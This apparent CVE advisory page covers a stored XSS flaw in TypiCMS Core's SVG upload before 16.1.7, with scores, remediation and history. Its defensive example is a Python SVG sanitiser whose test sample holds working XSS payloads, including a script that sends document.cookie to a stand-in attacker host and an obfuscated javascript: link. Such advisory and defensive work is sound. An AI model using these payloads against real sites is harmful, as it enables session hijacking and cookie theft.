Description
TypiCMS is a multilingual content management system based on the Laravel framework. A Stored Cross-Site Scripting (XSS) vulnerability exists in the file upload module of TypiCMS prior to version 16.1.7. The application allows users with file upload permissions to upload SVG files. While there is a MIME type validation, the content of the SVG file is not sanitized. An attacker can upload a specially crafted SVG file containing malicious JavaScript code. When another user (such as an administrator) views or accesses this file through the application, the script executes in their browser, leading to a compromise of that user's session. The issue is exacerbated by a bug in the SVG parsing logic, which can cause a 500 error if the uploaded SVG does not contain a `viewBox` attribute. However, this does not mitigate the XSS vulnerability, as an attacker can easily include a valid `viewBox` attribute in their malicious payload. Version 16.1.7 of TypiCMS Core fixes the issue.
Published: 2026-02-25
Score: 6.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored XSS enabling session hijacking via malicious SVG uploads
Action: Patch
AI Analysis

Impact

A stored Cross‑Site Scripting flaw exists in the file upload module of TypiCMS Core before version 16.1.7. The application accepts SVG files based on MIME type alone, but does not sanitise the file contents. An attacker can craft an SVG containing JavaScript and upload it. When another user—such as an administrator—views the SVG through the CMS, the script runs in that user’s browser, allowing the attacker to hijack the session and execute arbitrary actions with the victim’s credentials.

Affected Systems

TypiCMS Core versions earlier than 16.1.7 are affected; the NVD CPE (cpe:2.3:a:typicms:typicms:*) carries no lower bound, so treat every prior release as vulnerable. The only fix is to upgrade to 16.1.7 or later.

Risk and Exploitability

The CVSS 4.0 base score of 6.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:H) is Medium: network‑reachable and low complexity, but it requires an account with upload permission and active interaction by the victim; NVD's CVSS 3.1 assessment is 5.4 (PR:L/UI:R/S:C). The very low EPSS (<1%) suggests little observed exploitation, and the CVE is not in CISA's KEV catalog, although the SSVC enrichment records Exploitation: poc (a public proof of concept exists) and Automatable: no. A privileged user is compromised only when the browser renders the uploaded SVG as a document from the CMS origin, for example by opening the file's URL directly; an SVG referenced through an <img> tag or served as a download with Content‑Disposition: attachment does not execute script, so how uploads are served matters as much as how they are validated. The 500 error triggered by an SVG without a viewBox attribute does not mitigate the issue: the attacker simply includes a valid viewBox in the payload.

Generated by OpenCVE AI on April 18, 2026 at 10:49 UTC.

Remediation

Vendor fix: TypiCMS Core 16.1.7 (see GHSA-xfvg-8v67-j7wp). No separate workaround is published; restricting upload permissions and sanitising or quarantining SVG content are interim mitigations only.

OpenCVE Recommended Actions

  • Upgrade TypiCMS Core to version 16.1.7 or later to apply the vendor fix that sanitises SVG uploads.
  • Restrict or disable file upload capabilities for non‑administrative accounts, ensuring only trusted users can upload SVG files.
  • Validate image uploads by content, not by declared MIME type alone (magic bytes for JPEG/PNG, a parsed XML tree for SVG). For SVG, strip <script> and <foreignObject> elements, on* event‑handler attributes and javascript: hrefs before storage, or reject the file outright; and serve uploads with Content‑Disposition: attachment or from a separate origin so an SVG that slips through cannot run with the CMS session.

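The following Python module is an added example written for this page; it is not TypiCMS code and not the fix shipped in 16.1.7. It shows the step the vulnerable upload handler lacks: the MIME type says the file is image/svg+xml, but only parsing the body reveals the <script> element, the onload handler, the entity‑obfuscated javascript: href and the foreignObject carrying HTML. It also turns the missing‑viewBox crash described above into an explicit rejection. All names (SvgUploadRejected, sanitize_svg, DANGEROUS_ELEMENTS) and the sample payload are this example's own; the payload is constructed to match the advisory's description, not a captured exploit. The standard‑library parser is used for portability; in production prefer defusedxml or a maintained SVG sanitizer.

```python
"""Content-level SVG upload validation (added example, not TypiCMS code).

CVE-2026-27621 arises because the upload handler trusts the declared MIME
type (image/svg+xml) and stores the file body untouched. The functions below
parse the SVG and strip anything that can execute script. All names here are
this example's own. xml.etree does not defend against entity-expansion bombs;
use defusedxml or a maintained sanitizer in production, and additionally
serve uploads as attachments or from a separate origin.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep the serialized output prefix-free
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or embed arbitrary (X)HTML. Deliberately conservative.
DANGEROUS_ELEMENTS = {"script", "foreignObject", "set", "handler", "iframe", "embed", "object"}
# Attributes whose value a browser may navigate to or load.
URL_ATTRIBUTES = {"href", "src"}
_SCRIPT_SCHEME = re.compile(r"^(javascript|vbscript|data):", re.IGNORECASE)


class SvgUploadRejected(ValueError):
    """Raised for input that is not acceptable SVG (maps to an HTTP 4xx, not a 500)."""


def _local(qualified: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qualified.rsplit("}", 1)[-1]


def _is_script_url(value: str) -> bool:
    # Browsers ignore whitespace and control characters inside a scheme, so
    # "jav<TAB>ascript:" (written as jav&#x09;ascript: in the file) still runs.
    # Character references are already decoded by the XML parser here.
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value)
    return bool(_SCRIPT_SCHEME.match(cleaned))


def sanitize_svg(data: bytes, require_viewbox: bool = False):
    """Parse an uploaded SVG, remove script-capable content and return
    (sanitized_bytes, list_of_removed_items)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        raise SvgUploadRejected(f"not well-formed XML: {exc}") from exc
    if _local(root.tag) != "svg":
        raise SvgUploadRejected("root element is not <svg>")
    # The unpatched handler crashed on SVGs without viewBox; check it up front
    # so the outcome is a clean rejection rather than a server error.
    if require_viewbox and "viewBox" not in root.attrib:
        raise SvgUploadRejected("missing viewBox attribute")

    removed = []
    # Pass 1: drop dangerous elements together with their subtrees.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in DANGEROUS_ELEMENTS:
                parent.remove(child)
                removed.append(f"<{_local(child.tag)}> element")
    # Pass 2: strip event handlers and script-scheme URLs from what remains.
    for el in root.iter():
        for name in list(el.attrib):
            local = _local(name).lower()
            if local.startswith("on"):
                del el.attrib[name]
                removed.append(f"{local} attribute on <{_local(el.tag)}>")
            elif local in URL_ATTRIBUTES and _is_script_url(el.attrib[name]):
                del el.attrib[name]
                removed.append(f"script URL in {local} on <{_local(el.tag)}>")
    return ET.tostring(root, encoding="utf-8"), removed


# Constructed sample payload shaped like the attack the advisory describes:
# declared as image/svg+xml, viewBox present (so the old parser would not 500),
# and script smuggled in four different ways.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     viewBox="0 0 100 100" onload="alert(document.cookie)">
  <script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>
  <a xlink:href="jav&#x09;ascript:alert(1)"><rect width="100" height="100"/></a>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml">
    <img src="x" onerror="alert(1)"/></body></foreignObject>
</svg>"""

# Constructed benign upload: must pass through untouched.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle r="5"/></svg>'


if __name__ == "__main__":
    clean, removed = sanitize_svg(MALICIOUS_SVG)
    print("\n".join(removed))
    print(clean.decode())
```

Sanitising is one half of the defence; the other is never letting the CMS origin render an upload inline. Even with the sanitizer in place, serve the uploads directory with Content‑Disposition: attachment (or from a cookieless host), which makes a bypass of the filter a nuisance rather than a session takeover.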


Advisories

  • GitHub GHSA GHSA-xfvg-8v67-j7wp: TypiCMS Core has Stored Cross-Site Scripting (XSS) via SVG File Upload
History

Sat, 28 Feb 2026 04:15:00 +0000

  Metrics added: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 27 Feb 2026 19:15:00 +0000

  First time appeared: Typicms typicms
  CPEs added: cpe:2.3:a:typicms:typicms:*:*:*:*:*:*:*:*
  Vendors & Products added: Typicms typicms
  Metrics added: cvssV3_1 {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Wed, 25 Feb 2026 12:00:00 +0000

  First time appeared: Typicms, Typicms core
  Vendors & Products added: Typicms, Typicms core

Wed, 25 Feb 2026 03:15:00 +0000

  Description added: (identical to the Description at the top of this page)
  Title added: TypiCMS Core has Stored Cross-Site Scripting (XSS) via SVG File Upload
  Weaknesses added: CWE-79
  References added: (none shown)
  Metrics added: cvssV4_0 {'score': 6.8, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T20:59:12.644Z

Reserved: 2026-02-20T22:02:30.026Z

Link: CVE-2026-27621

Vulnrichment

Updated: 2026-02-26T20:59:08.842Z

NVD

Status : Analyzed

Published: 2026-02-25T03:16:06.173

Modified: 2026-06-17T10:27:24.260

Link: CVE-2026-27621

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T11:00:05Z

Weaknesses
  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')